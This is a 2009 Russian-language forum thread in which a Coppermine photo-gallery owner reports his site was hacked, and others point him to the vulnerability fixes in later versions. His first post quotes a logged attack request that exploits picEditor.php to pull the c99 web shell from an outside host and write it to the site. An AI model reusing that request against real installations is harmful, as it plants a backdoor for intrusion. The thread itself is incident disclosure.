Topic: Срочно ! Взломали фотогалерею. Привожу при (Read 5075 times)

pansionat · « **on:** February 02, 2009, 06:40:06 pm »

Срочно ! Взломали фотогалерею. К сожалению не очень сильно знаю английский. Но вот привожу лог залива постороних файлов через дырку в скрипте:
мой сайт/picEditor.php?img_dir=http://xakforum.altnet.ru/tmp_upload/files/c99shell.txt&CURRENT_PIC[filename]=/1.php

Надеюсь подправят уязвимость

MISHA · « **Reply #1 on:** February 03, 2009, 01:53:13 pm »

версия 4.18 ? вроде там была уязвимость

pansionat · « **Reply #2 on:** February 03, 2009, 04:54:37 pm »

У меня версия этого файла 1.4.16
Но дело в том, что я сравнил файлы версий и разница тольв этом
Версия 1.4.16
<? starttable("100%", $lang_editpics_php['crop_title'], 3); ?>

Версия 1.4.19
<?php starttable("100%", $lang_editpics_php['crop_title'],?>

Неужели такое незначительное изменение устраняет проблему ?

MISHA · « **Reply #3 on:** February 04, 2009, 01:32:36 am »

я в этом полный ноль, советую обновить.

Makc666 · « **Reply #4 on:** February 04, 2009, 07:45:31 pm »

То, что у Вас сделали, это уязвимость найденная и исправленная в версии 1.4.17
http://forum.coppermine-gallery.net/index.php/topic,51787.0.html

Также была и версия 1.4.19, которая тоже имела дыру:
http://forum.coppermine-gallery.net/index.php/topic,54235.0.html

Хочу обратить внимание, что уже вышла новая версия 1.4.20, где была исправлена серьезная уязвимость версии 1.4.19!

News:

Author Topic: Срочно ! Взломали фотогалерею. Привожу при (Read 5075 times)

pansionat

Срочно ! Взломали фотогалерею. Привожу при

MISHA

Re: Ñðî÷íî ! Âçëîìàëè ôîòîãàëåðåþ. Ïðèâîæó ïðèìåð

pansionat

Re: Уязвимость в picEditor.php

MISHA

Re: Ñðî÷íî ! Âçëîìàëè ôîòîãàëåðåþ. Ïðèâîæó ïðèìåð

Makc666

Re: Срочно ! Взломали фотогалерею. Привожу при